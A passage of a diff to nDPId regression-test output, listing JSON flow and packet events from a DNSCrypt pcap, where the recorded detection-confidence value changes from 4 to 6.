AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":489,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":45682,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":489,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":45682,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":490,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739391046} 00421{"packet_event_id":1,"packet_event_name":"packet","packet_id":490,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739391046,"pkt":"REREREREZmZmZmZmCABFAABQBYcAuX4RC\/UKAAABi2PeSAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":491,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":59400,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":197,"flow_packet_id":1,"flow_last_seen":946739391046,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739391046,"pkt":"REREREREZmZmZmZmCABFAAIcBYlAAH4Ryt8KAAABi2PeSOgIIPsCCCyCmlUBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANkbnMEc2VieQJpbwAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":491,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":59400,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":491,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":59400,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":492,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":49796,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":492,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":198,"flow_packet_id":1,"flow_last_seen":946739391046,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739391046,"pkt":"REREREREZmZmZmZmCABFAAXcBYogAH4R5x4KAAABi2PeSMKEIPsGBMwAmlgBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANkbnMEc2VieQJpbwAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":492,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":49796,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":492,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739391046,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":49796,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":493,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739391046} 00421{"packet_event_id":1,"packet_event_name":"packet","packet_id":493,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739391046,"pkt":"REREREREZmZmZmZmCABFAABQBYoAuX4RC\/IKAAABi2PeSAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":494,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":2,"flow_last_seen":946739391306,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":946739391306,"pkt":"ZmZmZmZmRERERERECABFAADSWtFAACoRyuGLY95ICgAAASD7snIAvm5FmleBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydANkbnMEc2VieQJpbwAAEAABwAwAEAABAABwgAB9fEROU0MAAgAAAR0hTbelwStbUvrsyN4TMcjd6ciaJLWS\/+lAjdb\/qhY\/GqLYEoO6rv\/+JZlrPe5rwefrjN2pIualeqx6XQ1AD9Zj2kPVDPuO2VaFeIl38Qe5+u3sSCCBiqzaCgrP\/G5+1mPaQ9UM+44AAAABX1NQIl9UoaI="} @@ -997,53 +997,53 @@ 00708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":496,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":197,"flow_packet_id":2,"flow_last_seen":946739391308,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":946739391308,"pkt":"ZmZmZmZmRERERERECABFAADSWtJAACoRyuCLY95ICgAAASD76AgAvjixmlWBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydANkbnMEc2VieQJpbwAAEAABwAwAEAABAABwgAB9fEROU0MAAgAAAR0hTbelwStbUvrsyN4TMcjd6ciaJLWS\/+lAjdb\/qhY\/GqLYEoO6rv\/+JZlrPe5rwefrjN2pIualeqx6XQ1AD9Zj2kPVDPuO2VaFeIl38Qe5+u3sSCCBiqzaCgrP\/G5+1mPaQ9UM+44AAAABX1NQIl9UoaI="} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":497,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":48300,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":497,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":199,"flow_packet_id":1,"flow_last_seen":946739396047,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739396047,"pkt":"REREREREZmZmZmZmCABFAAIclEJAAH4RqpMKAAABkFtq47ysAbsCCL4UZl4BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdANvbmUAABAAAQAAAAAAAAAAAAHHAAwBwwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":497,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":48300,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":497,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":48300,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":498,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":41108,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":498,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":1,"flow_last_seen":946739396047,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739396047,"pkt":"REREREREZmZmZmZmCABFAAXclEMgAH4RxtIKAAABkFtq46CUAbsGBGABZlsBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdANvbmUAABAAAQAAAAAAAAAAAAXDAAwFvwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":498,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":41108,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":498,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":41108,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":499,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739396047} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":499,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739396047,"pkt":"REREREREZmZmZmZmCABFAABQlEMAuX4R66UKAAABkFtq4wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":500,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396047,"flow_last_seen":946739396047,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739396047,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":48237,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":500,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":201,"flow_packet_id":1,"flow_last_seen":946739396047,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739396047,"pkt":"REREREREZmZmZmZmCABFAAXclEQgAH4RxtEKAAABkFtq47xtAbsGBEQqZlkBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdANvbmUAABAAAQAAAAAAAAAAAAXDAAwFvwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA